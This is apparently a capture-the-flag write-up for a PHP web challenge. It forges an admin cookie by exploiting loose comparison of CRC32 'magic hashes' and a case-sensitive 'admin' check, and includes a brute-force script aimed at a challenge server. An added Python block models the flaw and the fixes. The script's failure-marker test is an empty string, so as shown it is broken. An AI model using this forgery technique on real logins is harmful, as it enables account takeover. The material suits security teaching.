
Web 200


The goal of this task is to log in as the user with idx=1. But we don't know who has this idx.

The cookie hash algorithm is CRC32, which is strange: CRC32 is a checksum, not a cryptographic hash. Still, at first glance the server code looked good enough. REALLY THANKS TO THE ORGS, BECAUSE THE CODE IS GREAT AND SIMPLE, SO IT'S REALLY EASY TO UNDERSTAND THE LOGIC OF THE SERVER

After reading some manuals we decided that the vuln was in the hash comparison, and found a post about comparison issues in PHP with float-like strings.

PHP is not strongly typed, which leads to some magic in comparisons; one piece of that magic is that two strings are both cast to float if they look like floats. For example:

	if ("0e12" == "0")
		echo 1;
	else
		echo 2;

This code prints 1!!!! This is magic: two different strings are equal))

So we decided to brute-force the cookie: we always sent hash = "0" with a different timestamp each time.

Some calculation: we need the first symbol of the hash to be "0", the second "e", and all the others digits. So the probability is 1/16 * 1/16 * (10/16)**6, which works out to about 1/4300, not much for an online brute force.

The first part was done: we could log in with any id we wanted. But which id did we need?

After reading the code we found this strange piece:

public function islogin(){
    if( preg_match("/[^0-9A-Za-z]/", $_COOKIE['user_name']) ){
        exit("cannot be used Special character");
    }

    if( $_COOKIE['user_name'] == "admin" )  return 0;

    $salt = file_get_contents("../../long_salt.txt");

    if( hash('crc32',$salt.'|'.(int)$_COOKIE['login_time'].'|'.$_COOKIE['user_name']) == $_COOKIE['hash'] ){
        return 1;
    }

    return 0;
}

The 6th line seems strange: why is the admin user restricted? This is easy to bypass. We just need to log in with the name in uppercase, because PHP uses a case-sensitive comparison but SQL does not.
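As an added example (not part of the original writeup or the challenge code), the following Python models the two PHP behaviours above: the loose `==` that makes a `0e<digits>` CRC32 digest equal to `"0"`, with the resulting ~1/4300 probability, and the case-sensitive `"admin"` check, each next to the check that closes it. The digest value `0e123456` is constructed.

```python
import hmac
import re

# PHP treats a string as numeric when it looks like an int or float literal.
# "0e123456" parses as 0 * 10**123456 == 0.0, so under loose comparison
# "0e123456" == "0" is true, which is what the cookie forgery relies on.
PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")

def php_loose_eq(a: str, b: str) -> bool:
    """Model PHP's == on two strings: numeric-looking strings compare as floats."""
    if PHP_NUMERIC.match(a) and PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b

def is_magic_hash(hexdigest: str) -> bool:
    """True if a hex digest has the form 0e<digits>, i.e. is loosely equal to "0"."""
    return re.fullmatch(r"0e[0-9]+", hexdigest) is not None

def magic_fraction(hex_len: int = 8) -> float:
    """Share of hex_len-character digests that are magic: '0', 'e', then digits.
    For CRC32 (8 hex chars) this is 10**6 / 16**8, about 1 in 4295, matching
    the 1/16 * 1/16 * (10/16)**6 estimate in the writeup."""
    return 10 ** (hex_len - 2) / 16 ** hex_len

def verify_cookie_loose(expected: str, supplied: str) -> bool:
    """The vulnerable pattern: hash(...) == $_COOKIE['hash'] in PHP."""
    return php_loose_eq(expected, supplied)

def verify_cookie_strict(expected: str, supplied: str) -> bool:
    """Hardened check: byte-exact and constant-time, the equivalent of PHP's
    hash_equals() (a === comparison would also stop the type juggling)."""
    return hmac.compare_digest(expected.encode(), supplied.encode())

def is_reserved_name(user_name: str) -> bool:
    """Compare the name the way a case-insensitive SQL collation would, so
    'ADMIN' cannot slip past a check written as == "admin"."""
    return user_name.casefold() == "admin"

if __name__ == "__main__":
    magic = "0e123456"  # constructed digest of the vulnerable shape
    print(verify_cookie_loose(magic, "0"))   # True: forged hash "0" accepted
    print(verify_cookie_strict(magic, "0"))  # False: forgery rejected
    print(f"about 1 in {1 / magic_fraction():.0f} CRC32 digests are magic")
    print(is_reserved_name("ADMIN"))         # True: uppercase no longer bypasses
```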

So the brute-force script is:

import requests

u1 = "http://219.240.37.153:5959/63972dfdacc8a838f618275d80d27c1d_h/index.php"

# hash is always "0"; the login is accepted as soon as the server-side CRC32 of
# salt|login_time|user_name happens to look like "0e<digits>" (about 1 in 4300).
# "ADMIN" instead of "admin" gets past the case-sensitive PHP check.
for i in range(0, 10000000):
    print(i)
    cookies = {
        "login_time": str(i),
        "user_name": "ADMIN",
        "hash": "0",
    }
    try:
        r = requests.get(u1, cookies=cookies).text
    except requests.RequestException:
        continue
    # failure marker string (its value was not preserved in the writeup)
    if '' not in r:
        print(r)
        raise SystemExit(0)